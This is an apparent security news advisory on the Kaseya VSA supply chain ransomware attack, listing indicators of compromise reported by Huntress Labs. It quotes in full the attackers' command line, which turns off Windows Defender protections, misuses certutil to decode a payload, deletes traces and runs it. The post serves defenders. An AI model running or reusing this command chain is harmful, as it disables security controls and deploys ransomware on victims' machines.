MSPs Using Kaseya VSA Find Themselves Distributing Ransomware
Kaseya, a provider of IT management software, has found itself at the center of what seems to be a supply chain attack. The first signs became visible just after noon EDT today after Kaseya and the Cybersecurity & Infrastructure Security Agency (CISA) encouraged Managed Service Providers (MSPs) to shut down their Kaseya VSA servers to avoid losing administrative access or becoming the victim of ransomware, along with their entire customer base.
Currently, Kaseya is still investigating the cause and is uncertain what has led to these exploitations, but what is known for sure is that when threat actors gain access into a VSA server, they take over the administrative accounts, and spread the ransomware to all of the MSPs customers.
Kaseya VSA is a tool for Remote Monitoring and Management often used by MSPs to efficiently manage and monitor the networks they oversee. So far no other Kaseya products including IT Glue have been noted as an attack vector, but administrators may want to be on the lookout.
According to the security firm Huntress Labs, via their post on r/msp, as of 7:50 pm EDT on Friday, July 2nd, a total of 8 MSPs have reported being affected by the supply chain attack, resulting in ransomware hitting thousands of endpoints across these MSPs, with one MSP in the Netherlands reporting more than 2,100 endpoints affected and over 200 businesses being encrypted. One ransom demand has come in at $5 million, and it’s believed the threat actors are related to the REvil ransomware gang.
The current indicators shared by Huntress Labs in their Reddit post and others are as follows:
- gent.crt is dropped by the Kaseya VSA.
- The file is then decoded with certutil to carve out agent.exe, which is dropped to the C:\kworking folder.
- Inside agent.exe, are two files. MsMpEng.exe and mpsvc.dll. While the exe is legitimate, the dll is malicious and is used to activate the attack.
- The VSA procedure is named “Kaseya VSA Agent Hot-fix”
For those who log PowerShell, the may notice this activity coming from the parent path of C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe:
: “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
A copy of the malicious DLL associated with this attack has already been posted on VirusTotal. Additional hashes are as follows per Sophos’s blog:
Thanks to Sophos and HuntressLabs for their contributions toward helping the community learn and react to this attack as it remains ongoing. Check back for additional updates as available.